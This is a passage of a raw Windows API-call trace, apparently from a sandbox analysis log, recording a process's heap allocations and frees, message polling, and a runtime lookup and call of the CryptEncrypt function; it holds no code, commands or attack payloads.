hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x24a9420 [0265.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9420, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.923] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6468 [0265.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.924] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0265.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.929] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.930] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.931] HeapFree (in: hHeap=0x25c0000, 